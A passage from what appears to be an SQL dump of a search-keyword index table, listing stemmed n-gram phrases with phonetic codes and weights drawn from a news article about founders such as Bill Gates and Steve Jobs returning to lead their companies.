fight','prepar to fight',0,1,1.5667,'P6163123',1,'en'),(42439,'private last','privat last',0,1,1.4,'P613423',1,'en'),(42440,'private last year','privat last year',0,1,1.5667,'P6134236',1,'en'),(42441,'problem comes','problem comes',0,1,1.4333,'P6145252',1,'en'),(42442,'problem comes if','problem comes if',0,1,1.5333,'P61452521',1,'en'),(42443,'products good','product good',0,1,1.4333,'P632323',1,'en'),(42444,'products good looking','product good looking',0,1,1.7,'P6323234252',1,'en'),(42445,'programmer','programm',0,0,0.6667,'P62656',1,'en'),(42446,'programmer who','programm who',0,1,1.4667,'P62656',1,'en'),(42447,'programmer who saw','programm who saw',0,1,1.6,'P626562',1,'en'),(42448,'protesting','protest',0,0,0.6667,'P632352',1,'en'),(42449,'protesting and','protest and',0,1,1.4667,'P63235253',1,'en'),(42450,'protesting and complaining','protest and complaining',0,1,1.8667,'P63235253251452',1,'en'),(42451,'pursuits','pursuit',0,0,0.5333,'P6232',1,'en'),(42452,'pursuits remaining','pursuit remaining',0,1,1.6,'P6232652',1,'en'),(42453,'pursuits remaining focused','pursuit remaining focused',0,1,1.8667,'P6232652123',1,'en'),(42454,'put a','put a',0,1,1.1667,'P300',1,'en'),(42455,'put a pc','put a pc',0,1,1.2667,'P312',1,'en'),(42456,'quit','quit',0,0,0.2667,'Q300',1,'en'),(42457,'quit being','quit being',0,1,1.3333,'Q3152',1,'en'),(42458,'quit being forced','quit being forced',0,1,1.5667,'Q31521623',1,'en'),(42459,'ralph lauren continues','ralph lauren continues',0,1,1.7333,'R4146525352',1,'en'),(42460,'rather than','rather than',0,1,1.3667,'R3635',1,'en'),(42461,'rather than a','rather than a',0,1,1.4333,'R3635',1,'en'),(42462,'realizes','realiz',0,0,0.5333,'R420',1,'en'),(42463,'realizes davis','realiz davis',0,1,1.4667,'R42312',1,'en'),(42464,'realizes davis being','realiz davis being',0,1,1.6667,'R42312152',1,'en'),(42465,'really gates','realli gates',0,1,1.4,'R4232',1,'en'),(42466,'really gates is','realli gates is',0,1,1.5,'R4232',1,'en'),(42467,'recapture','recaptur',0,0,0.6,'R2136',1,'en'),(42468,'recapture the','recaptur the',0,1,1.4333,'R21363',1,'en'),(42469,'recapture the innovation','recaptur the innovation',0,1,1.8,'R213635135',1,'en'),(42470,'referred','refer',0,0,0.5333,'R163',1,'en'),(42471,'referred to','refer to',0,1,1.3667,'R163',1,'en'),(42472,'referred to elaine','refer to elaine',0,1,1.6,'R16345',1,'en'),(42473,'referred to when','refer to when',0,1,1.5333,'R1635',1,'en'),(42474,'reign','reign',0,0,0.3333,'R250',1,'en'),(42475,'reign it','reign it',0,1,1.2667,'R253',1,'en'),(42476,'reign it became','reign it became',0,1,1.5,'R253125',1,'en'),(42477,'relatedbill','relatedbil',0,0,0.7333,'R4314',1,'en'),(42478,'relatedbill gates','relatedbil gates',0,1,1.5667,'R4314232',1,'en'),(42479,'relatedbill gates to','relatedbil gates to',0,1,1.6667,'R43142323',1,'en'),(42480,'released','releas',0,0,0.5333,'R423',1,'en'),(42481,'released in','releas in',0,1,1.3667,'R4235',1,'en'),(42482,'released in 2007','releas in 2007',0,1,1.5333,'R4235',1,'en'),(42483,'remaining focused','remain focused',0,1,1.5667,'R52123',1,'en'),(42484,'remaining focused on','remain focused on',0,1,1.6667,'R521235',1,'en'),(42485,'restructures','restructur',0,0,0.8,'R2362362',1,'en'),(42486,'restructures the','restructur the',0,1,1.5333,'R23623623',1,'en'),(42487,'restructures the company','restructur the company',0,1,1.8,'R236236232515',1,'en'),(42488,'retailing','retail',0,0,0.6,'R3452',1,'en'),(42489,'retailing if','retail if',0,1,1.4,'R34521',1,'en'),(42490,'retailing if gates','retail if gates',0,1,1.6,'R34521232',1,'en'),(42491,'retool','retool',0,0,0.4,'R340',1,'en'),(42492,'retool the','retool the',0,1,1.3333,'R343',1,'en'),(42493,'retool the pc','retool the pc',0,1,1.4333,'R34312',1,'en'),(42494,'returned to','return to',0,1,1.3667,'R3653',1,'en'),(42495,'returned to an','return to an',0,1,1.4667,'R36535',1,'en'),(42496,'returns to apple','return to apple',0,1,1.5333,'R3652314',1,'en'),(42497,'revitalisation','revitalis',0,0,0.9333,'R134235',1,'en'),(42498,'revitalisation efforts','revitalis efforts',0,1,1.7333,'R1342351632',1,'en'),(42499,'revitalisation efforts with','revitalis efforts with',0,1,1.9,'R13423516323',1,'en'),(42500,'richard schulze','richard schulze',0,1,1.5,'R263242',1,'en'),(42501,'richard schulze troublesome','richard schulze troublesome',0,1,1.9,'R263242361425',1,'en'),(42502,'rivals','rival',0,0,0.4,'R142',1,'en'),(42503,'rivals and','rival and',0,1,1.3333,'R14253',1,'en'),(42504,'rivals and friends','rival and friends',0,1,1.6,'R1425316532',1,'en'),(42505,'role in','role in',0,1,1.2333,'R450',1,'en'),(42506,'role in service','role in service',0,1,1.5,'R452612',1,'en'),(42507,'run data','run data',0,1,1.2667,'R530',1,'en'),(42508,'run data centers','run data centers',0,1,1.5333,'R5325362',1,'en'),(42509,'running on','run on',0,1,1.3333,'R525',1,'en'),(42510,'running on microsoft','run on microsoft',0,1,1.6667,'R52526213',1,'en'),(42511,'safe 93','safe 93',0,1,1.2333,'S100',1,'en'),(42512,'safe 93 percent','safe 93 percent',0,1,1.5,'S16253',1,'en'),(42513,'said he','said he',0,1,1.2333,'S300',2,'en'),(42514,'said he was','said he was',0,1,1.3667,'S320',1,'en'),(42515,'said his','said his',0,1,1.2667,'S320',1,'en'),(42516,'said his philanthropic','said his philanthropic',0,1,1.7333,'S321453612',1,'en'),(42517,'sales growth','sale growth',0,1,1.4,'S4263',1,'en'),(42518,'sales growth slowed','sale growth slowed',0,1,1.6333,'S4263243',1,'en'),(42519,'satya','satya',0,0,0.3333,'S300',1,'en'),(42520,'satya nadella','satya nadella',0,1,1.4333,'S3534',1,'en'),(42521,'satya nadella as','satya nadella as',0,1,1.5333,'S35342',1,'en'),(42522,'satya nadella restructures','satya nadella restructures',0,1,1.8667,'S353462362362',1,'en'),(42523,'saw the need','saw the need',0,1,1.4,'S353',1,'en'),(42524,'schultz','schultz',0,0,0.4667,'S432',1,'en'),(42525,'schultz did','schultz did',0,1,1.3667,'S4323',1,'en'),(42526,'schultz did with','schultz did with',0,1,1.5333,'S4323',1,'en'),(42527,'schultz who','schultz who',0,1,1.3667,'S432',1,'en'),(42528,'schultz who has','schultz who has',0,1,1.5,'S432',1,'en'),(42529,'schulze','schulz',0,0,0.4667,'S420',1,'en'),(42530,'schulze troublesome','schulz troublesome',0,1,1.6333,'S42361425',1,'en'),(42531,'schulze troublesome best','schulz troublesome best',0,1,1.8,'S42361425123',1,'en'),(42532,'screen devices','screen devices',0,1,1.4667,'S65312',1,'en'),(42533,'screen devices long','screen devices long',0,1,1.6333,'S65312452',1,'en'),(42534,'second reign','second reign',0,1,1.4,'S53625',1,'en'),(42535,'second reign it','second reign it',0,1,1.5,'S536253',1,'en'),(42536,'serial','serial',0,0,0.4,'S640',1,'en'),(42537,'serial business','serial business',0,1,1.5,'S641252',1,'en'),(42538,'serial business owner','serial business owner',0,1,1.7,'S64125256',1,'en'),(42539,'service at','servic at',0,1,1.3333,'S6123',1,'en'),(42540,'service at microsoft','servic at microsoft',0,1,1.6667,'S6123526213',1,'en'),(42541,'services a','servic a',0,1,1.3333,'S612',1,'en'),(42542,'services a good','servic a good',0,1,1.5,'S6123',1,'en'),(42543,'set it','set it',0,1,1.2,'S300',1,'en'),(42544,'set it on','set it on',0,1,1.3,'S350',1,'en'),(42545,'set outfits','set outfits',0,1,1.3667,'S3132',1,'en'),(42546,'set outfits at','set outfits at',0,1,1.4667,'S31323',1,'en'),(42547,'she these','she these',0,1,1.3,'S320',1,'en'),(42548,'she these that\'s','she these that',0,1,1.5333,'S3232',1,'en'),(42549,'shoe','shoe',0,0,0.2667,'S000',1,'en'),(42550,'shoe hold','shoe hold',0,1,1.3,'S430',1,'en'),(42551,'shoe hold dsw','shoe hold dsw',0,1,1.4333,'S432',1,'en'),(42552,'shop chain','shop chain',0,1,1.3333,'S125',1,'en'),(42553,'shop chain introduced','shop chain introduced',0,1,1.7,'S12536323',1,'en'),(42554,'should have','should have',0,1,1.3667,'S431',1,'en'),(42555,'should have left','should have left',0,1,1.5333,'S431413',1,'en'),(42556,'site davis','site davis',0,1,1.3333,'S312',1,'en'),(42557,'site davis referred','site davis referred',0,1,1.6333,'S3126163',1,'en'),(42558,'slowed','slow',0,0,0.4,'S430',1,'en'),(42559,'slowed mike','slow mike',0,1,1.3667,'S4352',1,'en'),(42560,'slowed mike lazaridis','slow mike lazaridis',0,1,1.7,'S435242632',1,'en'),(42561,'small screen','small screen',0,1,1.4,'S54265',1,'en'),(42562,'small screen devices','small screen devices',0,1,1.6667,'S54265312',1,'en'),(42563,'smart','smart',0,0,0.3333,'S563',1,'en'),(42564,'smart coming','smart coming',0,1,1.4,'S563252',1,'en'),(42565,'smart coming back','smart coming back',0,1,1.5667,'S56325212',1,'en'),(42566,'smartphone','smartphon',0,0,0.6667,'S56315',1,'en'),(42567,'smartphone maker','smartphon maker',0,1,1.5333,'S5631526',1,'en'),(42568,'smartphone maker after','smartphon maker after',0,1,1.7333,'S5631526136',1,'en'),(42569,'smartphones','smartphon',0,0,0.7333,'S563152',1,'en'),(42570,'smartphones and','smartphon and',0,1,1.5,'S56315253',1,'en'),(42571,'smartphones and tablets','smartphon and tablets',0,1,1.7667,'S563152531432',1,'en'),(42572,'software a','softwar a',0,1,1.3333,'S136',1,'en'),(42573,'software a major','softwar a major',0,1,1.5333,'S136526',1,'en'),(42574,'software and','softwar and',0,1,1.4,'S13653',1,'en'),(42575,'software and services','softwar and services',0,1,1.7,'S136532612',1,'en'),(42576,'software architect','softwar architect',0,1,1.6,'S1362323',1,'en'),(42577,'software architect relatedbill','softwar architect relatedbill',0,1,2,'S136232364314',1,'en'),(42578,'software maker','softwar maker',0,1,1.4667,'S136526',1,'en'),(42579,'software maker will','softwar maker will',0,1,1.6333,'S1365264',1,'en'),(42580,'software than','softwar than',0,1,1.4333,'S13635',1,'en'),(42581,'software than any','softwar than any',0,1,1.5667,'S13635',1,'en'),(42582,'some founders','some founders',0,1,1.4333,'S515362',1,'en'),(42583,'some founders never','some founders never',0,1,1.6333,'S515362516',1,'en'),(42584,'somebody','somebodi',0,0,0.5333,'S513',1,'en'),(42585,'somebody who','somebodi who',0,1,1.4,'S513',1,'en'),(42586,'somebody who should','somebodi who should',0,1,1.6333,'S513243',1,'en'),(42587,'sort of a','sort of a',0,1,1.3,'S631',1,'en'),(42588,'source of','sourc of',0,1,1.3,'S621',1,'en'),(42589,'source of the','sourc of the',0,1,1.4333,'S6213',1,'en'),(42590,'spinning','spin',0,0,0.5333,'S152',2,'en'),(42591,'spinning his','spin his',0,1,1.4,'S152',1,'en'),(42592,'spinning his after','spin his after',0,1,1.6,'S152136',1,'en'),(42593,'spoken','spoken',0,0,0.4,'S125',1,'en'),(42594,'spoken yang','spoken yang',0,1,1.3667,'S1252',1,'en'),(42595,'spoken yang started','spoken yang started',0,1,1.6333,'S1252363',1,'en'),(42596,'spurning','spurn',0,0,0.5333,'S1652',1,'en'),(42597,'spurning a','spurn a',0,1,1.3333,'S1652',1,'en'),(42598,'spurning a 47.5','spurn a 47.5',0,1,1.5,'S1652',1,'en'),(42599,'stages','stage',0,0,0.4,'S320',1,'en'),(42600,'stages he','stage he',0,1,1.3,'S320',1,'en'),(42601,'stages he built','stage he built',0,1,1.5,'S32143',1,'en'),(42602,'started yahoo','start yahoo',0,1,1.4333,'S363',1,'en'),(42603,'started yahoo with','start yahoo with',0,1,1.6,'S363',1,'en'),(42604,'stay with','stai with',0,1,1.3,'S300',1,'en'),(42605,'stay with you','stai with you',0,1,1.4333,'S300',1,'en'),(42606,'steve jobs bill','steve jobs bill',0,1,1.5,'S3121214',1,'en'),(42607,'stock had','stock had',0,1,1.3,'S323',1,'en'),(42608,'stock had lost','stock had lost',0,1,1.4667,'S323423',1,'en'),(42609,'structure that','structur that',0,1,1.4667,'S362363',1,'en'),(42610,'structure that established','structur that established',0,1,1.8667,'S362363231423',1,'en'),(42611,'struggled','struggl',0,0,0.6,'S36243',1,'en'),(42612,'struggled for','struggl for',0,1,1.4333,'S3624316',1,'en'),(42613,'struggled for survival','struggl for survival',0,1,1.7333,'S36243162614',1,'en'),(42614,'style what','style what',0,1,1.3333,'S343',1,'en'),(42615,'style what schultz','style what schultz',0,1,1.6,'S3432432',1,'en'),(42616,'success isn\'t','success isn',0,1,1.4333,'S530',1,'en'),(42617,'success isn\'t what\'s','success isn what',0,1,1.6667,'S532',1,'en'),(42618,'successful','success',0,0,0.6667,'S140',1,'en'),(42619,'successful efforts','success efforts',0,1,1.6,'S141632',1,'en'),(42620,'successful efforts to','success efforts to',0,1,1.7,'S1416323',1,'en'),(42621,'such a','such a',0,1,1.2,'S000',1,'en'),(42622,'such a hash','such a hash',0,1,1.3667,'S000',1,'en'),(42623,'supplier','supplier',0,0,0.5333,'S146',1,'en'),(42624,'supplier of','supplier of',0,1,1.3667,'S1461',1,'en'),(42625,'supplier of the','supplier of the',0,1,1.5,'S14613',1,'en'),(42626,'survival','surviv',0,0,0.5333,'S614',1,'en'),(42627,'survival and','surviv and',0,1,1.4,'S61453',1,'en'),(42628,'survival and with','surviv and with',0,1,1.5667,'S61453',1,'en'),(42629,'swelled','swell',0,0,0.4667,'S430',1,'en'),(42630,'swelled to','swell to',0,1,1.3333,'S430',1,'en'),(42631,'swelled to include','swell to include',0,1,1.6,'S435243',1,'en'),(42632,'tablets','tablet',0,0,0.4667,'T1432',1,'en'),(42633,'tablets most','tablet most',0,1,1.4,'T1432523',1,'en'),(42634,'tablets most not','tablet most not',0,1,1.5333,'T143252353',1,'en'),(42635,'take notice','take notice',0,1,1.3667,'T2532',1,'en'),(42636,'take notice of','take notice of',0,1,1.4667,'T25321',1,'en'),(42637,'takeover','takeov',0,0,0.5333,'T216',1,'en'),(42638,'takeover attempt','takeov attempt',0,1,1.5333,'T2163513',1,'en'),(42639,'takeover attempt last','takeov attempt last',0,1,1.7,'T2163513423',1,'en'),(42640,'takeover bid','takeov bid',0,1,1.4,'T21613',1,'en'),(42641,'takeover bid from','takeov bid from',0,1,1.5667,'T21613165',1,'en'),(42642,'technology concern','technolog concern',0,1,1.6,'T25425265',1,'en'),(42643,'technology concern he','technolog concern he',0,1,1.7,'T25425265',1,'en'),(42644,'testimonials','testimoni',0,0,0.8,'T23542',1,'en'),(42645,'testimonials and','testimoni and',0,1,1.5333,'T2354253',1,'en'),(42646,'testimonials and ralph','testimoni and ralph',0,1,1.7333,'T2354253641',1,'en'),(42647,'than 20','than 20',0,1,1.2333,'T500',1,'en'),(42648,'than 20 percent','than 20 percent',0,1,1.5,'T516253',1,'en'),(42649,'than a','than a',0,1,1.2,'T500',1,'en'),(42650,'than a \'i','than a i',0,1,1.3,'T500',1,'en'),(42651,'than any','than any',0,1,1.2667,'T500',2,'en'),(42652,'than any other','than any other',0,1,1.4667,'T536',2,'en'),(42653,'than he','than he',0,1,1.2333,'T500',1,'en'),(42654,'than he realizes','than he realizes',0,1,1.5333,'T5642',1,'en'),(42655,'that change','that change',0,1,1.3667,'T252',1,'en'),(42656,'that change jerry','that change jerry',0,1,1.5667,'T2526',1,'en'),(42657,'that developed','that developed',0,1,1.4667,'T1413',1,'en'),(42658,'that developed small','that developed small',0,1,1.6667,'T1413254',1,'en'),(42659,'that earth\'s','that earth',0,1,1.4,'T632',1,'en'),(42660,'that earth\'s largest','that earth largest',0,1,1.6667,'T6324623',1,'en'),(42661,'that established','that established',0,1,1.5333,'T231423',1,'en'),(42662,'that established windows','that established windows',0,1,1.8,'T231423532',1,'en'),(42663,'that he','that he',0,1,1.2333,'T000',1,'en'),(42664,'that he missed','that he missed',0,1,1.4667,'T523',1,'en'),(42665,'that set','that set',0,1,1.2667,'T230',1,'en'),(42666,'that set it','that set it',0,1,1.3667,'T230',1,'en'),(42667,'that the co','that the co',0,1,1.3667,'T200',1,'en'),(42668,'that they was','that they was',0,1,1.4333,'T200',1,'en'),(42669,'that\'s altered','that altered',0,1,1.4667,'T24363',1,'en'),(42670,'that\'s altered more','that altered more',0,1,1.6333,'T2436356',1,'en'),(42671,'that\'s style','that style',0,1,1.4,'T234',1,'en'),(42672,'that\'s style what','that style what',0,1,1.5667,'T2343',1,'en'),(42673,'the 58','the 58',0,1,1.2,'T000',1,'en'),(42674,'the 58 year','the 58 year',0,1,1.3667,'T600',1,'en'),(42675,'the co','the co',0,1,1.2,'T200',1,'en'),(42676,'the co founder','the co founder',0,1,1.4667,'T21536',1,'en'),(42677,'the company having','the company having',0,1,1.6,'T2515152',1,'en'),(42678,'the company lost','the company lost',0,1,1.5333,'T2515423',1,'en'),(42679,'the creation','the creation',0,1,1.4,'T2635',1,'en'),(42680,'the creation of','the creation of',0,1,1.5,'T26351',1,'en'),(42681,'the day','the day',0,1,1.2333,'T000',1,'en'),(42682,'the day to','the day to',0,1,1.3333,'T000',1,'en'),(42683,'the devices','the devices',0,1,1.3667,'T120',1,'en'),(42684,'the devices invented','the devices invented',0,1,1.6667,'T125153',1,'en'),(42685,'the early','the early',0,1,1.3,'T640',1,'en'),(42686,'the early 1900s','the early 1900s',0,1,1.5,'T642',1,'en'),(42687,'the early stages','the early stages',0,1,1.5333,'T64232',1,'en'),(42688,'the fledgling','the fledgling',0,1,1.4333,'T1432452',1,'en'),(42689,'the fledgling pc','the fledgling pc',0,1,1.5333,'T143245212',1,'en'),(42690,'the future and','the future and',0,1,1.4667,'T13653',1,'en'),(42691,'the future two','the future two',0,1,1.4667,'T1363',1,'en'),(42692,'the hardware','the hardware',0,1,1.4,'T636',1,'en'),(42693,'the hardware software','the hardware software',0,1,1.7,'T6362136',1,'en'),(42694,'the having','the having',0,1,1.3333,'T152',1,'en'),(42695,'the having trouble','the having trouble',0,1,1.6,'T1523614',1,'en'),(42696,'the hope','the hope',0,1,1.2667,'T100',1,'en'),(42697,'the hope is','the hope is',0,1,1.3667,'T120',1,'en'),(42698,'the innovation','the innovation',0,1,1.4667,'T5135',1,'en'),(42699,'the innovation and','the innovation and',0,1,1.6,'T51353',1,'en'),(42700,'the ipad changing','the ipad changing',0,1,1.5667,'T1325252',1,'en'),(42701,'the iphone','the iphone',0,1,1.3333,'T150',1,'en'),(42702,'the iphone as','the iphone as',0,1,1.4333,'T152',1,'en'),(42703,'the iphone were','the iphone were',0,1,1.5,'T156',1,'en'),(42704,'the ipod','the ipod',0,1,1.2667,'T130',1,'en'),(42705,'the ipod the','the ipod the',0,1,1.4,'T130',1,'en'),(42706,'the landscape','the landscape',0,1,1.4333,'T45321',1,'en'),(42707,'the landscape of','the landscape of',0,1,1.5333,'T45321',1,'en'),(42708,'the late','the late',0,1,1.2667,'T430',1,'en'),(42709,'the late 1990s','the late 1990s',0,1,1.4667,'T432',1,'en'),(42710,'the legacy\'','the legacy',0,1,1.3667,'T420',1,'en'),(42711,'the legacy\' mindset','the legacy mindset',0,1,1.6333,'T425323',1,'en'),(42712,'the majority','the majority',0,1,1.4,'T5263',1,'en'),(42713,'the majority of','the majority of',0,1,1.5,'T52631',1,'en'),(42714,'the management','the management',0,1,1.4667,'T5253',1,'en'),(42715,'the management group','the management group',0,1,1.6667,'T5253261',1,'en'),(42716,'the market','the market',0,1,1.3333,'T5623',1,'en'),(42717,'the market swelled','the market swelled',0,1,1.6,'T5623243',1,'en'),(42718,'the mobile','the mobile',0,1,1.3333,'T514',1,'en'),(42719,'the mobile trend','the mobile trend',0,1,1.5333,'T5143653',1,'en'),(42720,'the need for','the need for',0,1,1.4,'T5316',1,'en'),(42721,'the only choice','the only choice',0,1,1.5,'T542',1,'en'),(42722,'the original','the original',0,1,1.4,'T6254',1,'en'),(42723,'the original success','the original success',0,1,1.6667,'T62542',1,'en'),(42724,'the particular business','the particular business',0,1,1.7667,'T1632461252',1,'en'),(42725,'the particular design','the particular design',0,1,1.7,'T163246325',1,'en'),(42726,'the pc maker','the pc maker',0,1,1.4,'T12526',1,'en'),(42727,'the problem','the problem',0,1,1.3667,'T16145',1,'en'),(42728,'the problem comes','the problem comes',0,1,1.5667,'T16145252',1,'en'),(42729,'the programmer','the programmer',0,1,1.4667,'T162656',1,'en'),(42730,'the programmer who','the programmer who',0,1,1.6,'T162656',1,'en'),(42731,'the smart','the smart',0,1,1.3,'T2563',1,'en'),(42732,'the smart coming','the smart coming',0,1,1.5333,'T2563252',1,'en'),(42733,'the source','the source',0,1,1.3333,'T262',1,'en'),(42734,'the source of','the source of',0,1,1.4333,'T2621',1,'en'),(42735,'the steve','the steve',0,1,1.3,'T231',1,'en'),(42736,'the steve jobs','the steve jobs',0,1,1.4667,'T231212',1,'en'),(42737,'the stock had','the stock had',0,1,1.4333,'T2323',1,'en'),(42738,'the tradition','the tradition',0,1,1.4333,'T635',1,'en'),(42739,'the tradition and','the tradition and',0,1,1.5667,'T6353',1,'en'),(42740,'the via','the via',0,1,1.2333,'T100',1,'en'),(42741,'the via packets','the via packets',0,1,1.5,'T1232',1,'en'),(42742,'the way people','the way people',0,1,1.4667,'T140',1,'en'),(42743,'the web','the web',0,1,1.2333,'T100',1,'en'),(42744,'the web browser','the web browser',0,1,1.5,'T1626',1,'en'),(42745,'the world\'s','the world',0,1,1.3667,'T6432',1,'en'),(42746,'the world\'s most','the world most',0,1,1.5333,'T6432523',1,'en'),(42747,'theceojob','theceojob',0,0,0.6,'T210',1,'en'),(42748,'theceojob in','theceojob in',0,1,1.4,'T215',1,'en'),(42749,'theceojob in 2000','theceojob in 2000',0,1,1.5667,'T215',1,'en'),(42750,'their companies','their companies',0,1,1.5,'T625152',1,'en'),(42751,'their companies into','their companies into',0,1,1.6667,'T62515253',1,'en'),(42752,'there\'s a','there a',0,1,1.3,'T620',1,'en'),(42753,'there\'s a case','there a case',0,1,1.4667,'T620',1,'en'),(42754,'these that\'s','these that',0,1,1.4,'T232',1,'en'),(42755,'these that\'s style','these that style',0,1,1.6,'T23234',1,'en'),(42756,'they can\'t','thei can',0,1,1.3333,'T253',1,'en'),(42757,'they can\'t make','thei can make',0,1,1.5,'T25352',1,'en'),(42758,'they created','thei created',0,1,1.4,'T263',1,'en'),(42759,'they created gates','thei created gates',0,1,1.6,'T263232',1,'en'),(42760,'they was','thei was',0,1,1.2667,'T200',1,'en'),(42761,'they was forced','thei was forced',0,1,1.5,'T21623',1,'en'),(42762,'things after','thing after',0,1,1.4,'T52136',1,'en'),(42763,'things after he','thing after he',0,1,1.5,'T52136',1,'en'),(42764,'this time','thi time',0,1,1.3,'T235',1,'en'),(42765,'this time were','thi time were',0,1,1.4667,'T2356',1,'en'),(42766,'this what','thi what',0,1,1.3,'T230',1,'en'),(42767,'this what can','thi what can',0,1,1.4333,'T2325',1,'en'),(42768,'thompson','thompson',0,0,0.5333,'T5125',1,'en'),(42769,'thompson to','thompson to',0,1,1.3667,'T51253',1,'en'),(42770,'thompson to change','thompson to change',0,1,1.6,'T51253252',1,'en'),(42771,'threw','threw',0,0,0.3333,'T600',1,'en'),(42772,'threw their','threw their',0,1,1.3667,'T636',1,'en'),(42773,'threw their companies','threw their companies',0,1,1.7,'T63625152',1,'en'),(42774,'time as','time as',0,1,1.2333,'T520',1,'en'),(42775,'time as nadella\'s','time as nadella',0,1,1.5667,'T525342',1,'en'),(42776,'time later','time later',0,1,1.3333,'T5436',1,'en'),(42777,'time later the','time later the',0,1,1.4667,'T54363',1,'en'),(42778,'time really','time really',0,1,1.3667,'T564',1,'en'),(42779,'time really gates','time really gates',0,1,1.5667,'T564232',1,'en'),(42780,'time were','time were',0,1,1.3,'T560',1,'en'),(42781,'time were mostly','time were mostly',0,1,1.5333,'T565234',1,'en'),(42782,'to a goverment','to a goverment',0,1,1.4667,'T21653',1,'en'),(42783,'to an','to an',0,1,1.1667,'T500',1,'en'),(42784,'to an additional','to an additional',0,1,1.5333,'T5354',1,'en'),(42785,'to apple','to apple',0,1,1.2667,'T140',1,'en'),(42786,'to apple and','to apple and',0,1,1.4,'T1453',1,'en'),(42787,'to be happy','to be happy',0,1,1.3667,'T100',1,'en'),(42788,'to change bill','to change bill',0,1,1.4667,'T25214',1,'en'),(42789,'to companies','to companies',0,1,1.4,'T25152',1,'en'),(42790,'to companies and','to companies and',0,1,1.5333,'T2515253',1,'en'),(42791,'to continue','to continue',0,1,1.3667,'T2535',1,'en'),(42792,'to continue the','to continue the',0,1,1.5,'T25353',1,'en'),(42793,'to day','to day',0,1,1.2,'T000',1,'en'),(42794,'to day game','to day game',0,1,1.3667,'T250',1,'en'),(42795,'to day operations','to day operations',0,1,1.5667,'T16352',1,'en'),(42796,'to do next','to do next',0,1,1.3333,'T523',1,'en'),(42797,'to elaine','to elaine',0,1,1.3,'T450',1,'en'),(42798,'to elaine eisenman','to elaine eisenman',0,1,1.6,'T4525',1,'en'),(42799,'to eric','to eric',0,1,1.2333,'T620',1,'en'),(42800,'to eric dell','to eric dell',0,1,1.4,'T6234',1,'en'),(42801,'to fight','to fight',0,1,1.2667,'T123',1,'en'),(42802,'to fight it','to fight it',0,1,1.3667,'T123',1,'en'),(42803,'to figure','to figure',0,1,1.3,'T126',1,'en'),(42804,'to figure out','to figure out',0,1,1.4333,'T1263',1,'en'),(42805,'to fix','to fix',0,1,1.2,'T120',1,'en'),(42806,'to fix what','to fix what',0,1,1.3667,'T123',1,'en'),(42807,'to focus','to focus',0,1,1.2667,'T120',1,'en'),(42808,'to focus on','to focus on',0,1,1.3667,'T125',1,'en'),(42809,'to founder','to founder',0,1,1.3333,'T1536',1,'en'),(42810,'to founder comes','to founder comes',0,1,1.5333,'T1536252',1,'en'),(42811,'to give','to give',0,1,1.2333,'T210',1,'en'),(42812,'to give the','to give the',0,1,1.3667,'T213',1,'en'),(42813,'to google','to google',0,1,1.3,'T240',1,'en'),(42814,'to google inc','to google inc',0,1,1.4333,'T2452',1,'en'),(42815,'to his','to his',0,1,1.2,'T200',1,'en'),(42816,'to his chief','to his chief',0,1,1.4,'T210',1,'en'),(42817,'to include smartphones','to include smartphones',0,1,1.7333,'T52432563152',1,'en'),(42818,'to make laptops','to make laptops',0,1,1.5,'T5241312',1,'en'),(42819,'to make products','to make products',0,1,1.5333,'T52163232',1,'en'),(42820,'to non','to non',0,1,1.2,'T500',1,'en'),(42821,'to non business','to non business',0,1,1.5,'T51252',1,'en'),(42822,'to play','to play',0,1,1.2333,'T140',1,'en'),(42823,'to play key','to play key',0,1,1.3667,'T142',1,'en'),(42824,'to put a','to put a',0,1,1.2667,'T130',1,'en'),(42825,'to retool','to retool',0,1,1.3,'T634',1,'en'),(42826,'to retool the','to retool the',0,1,1.4333,'T6343',1,'en'),(42827,'to run data','to run data',0,1,1.3667,'T653',1,'en'),(42828,'to set','to set',0,1,1.2,'T230',1,'en'),(42829,'to set outfits','to set outfits',0,1,1.4667,'T23132',1,'en'),(42830,'to the particular','to the particular',0,1,1.5667,'T163246',1,'en'),(42831,'to use for','to use for',0,1,1.3333,'T216',1,'en'),(42832,'to use its','to use its',0,1,1.3333,'T232',1,'en'),(42833,'to when','to when',0,1,1.2333,'T500',1,'en'),(42834,'to when he','to when he',0,1,1.3333,'T500',1,'en'),(42835,'to win','to win',0,1,1.2,'T500',2,'en'),(42836,'to win the','to win the',0,1,1.3333,'T530',2,'en'),(42837,'took an','took an',0,1,1.2333,'T250',1,'en'),(42838,'took an additional','took an additional',0,1,1.6,'T25354',1,'en'),(42839,'took different','took different',0,1,1.4667,'T231653',1,'en'),(42840,'took different comes','took different comes',0,1,1.6667,'T231653252',1,'en'),(42841,'tradition','tradit',0,0,0.6,'T635',1,'en'),(42842,'tradition and','tradit and',0,1,1.4333,'T6353',1,'en'),(42843,'tradition and the','tradit and the',0,1,1.5667,'T6353',1,'en'),(42844,'training at','train at',0,1,1.3667,'T6523',1,'en'),(42845,'training at yahoo','train at yahoo',0,1,1.5667,'T6523',1,'en'),(42846,'trend he','trend he',0,1,1.2667,'T653',1,'en'),(42847,'trend he was','trend he was',0,1,1.4,'T6532',1,'en'),(42848,'trouble','troubl',0,0,0.4667,'T614',1,'en'),(42849,'trouble keeping','troubl keeping',0,1,1.5,'T6142152',1,'en'),(42850,'trouble keeping up','troubl keeping up',0,1,1.6,'T61421521',1,'en'),(42851,'troublesome best','troublesom best',0,1,1.5333,'T61425123',1,'en'),(42852,'troublesome best buy','troublesom best buy',0,1,1.6667,'T614251231',1,'en'),(42853,'trying to fix','try to fix',0,1,1.4333,'T652312',1,'en'),(42854,'twice the','twice the',0,1,1.3,'T230',1,'en'),(42855,'twice the problem','twice the problem',0,1,1.5667,'T2316145',1,'en'),(42856,'two long','two long',0,1,1.2667,'T452',1,'en'),(42857,'two long periods','two long periods',0,1,1.5333,'T4521632',1,'en'),(42858,'uk of','uk of',0,1,1.1667,'U210',1,'en'),(42859,'uk of the','uk of the',0,1,1.3,'U213',1,'en'),(42860,'under his','under his',0,1,1.3,'U5362',1,'en'),(42861,'under his watch','under his watch',0,1,1.5,'U536232',1,'en'),(42862,'unified','unifi',0,0,0.4667,'U513',1,'en'),(42863,'unified computer','unifi computer',0,1,1.5333,'U51325136',1,'en'),(42864,'unified computer itself','unifi computer itself',0,1,1.7667,'U513251363241',1,'en'),(42865,'universal','univers',0,0,0.6,'U51624',1,'en'),(42866,'universal motors','univers motors',0,1,1.5333,'U516245362',1,'en'),(42867,'universal motors co','univers motors co',0,1,1.6333,'U516245362',1,'en'),(42868,'until a','until a',0,1,1.2333,'U534',1,'en'),(42869,'until a couple','until a couple',0,1,1.4667,'U534214',1,'en'),(42870,'up smartphone','up smartphone',0,1,1.4333,'U1256315',1,'en'),(42871,'up smartphone maker','up smartphone 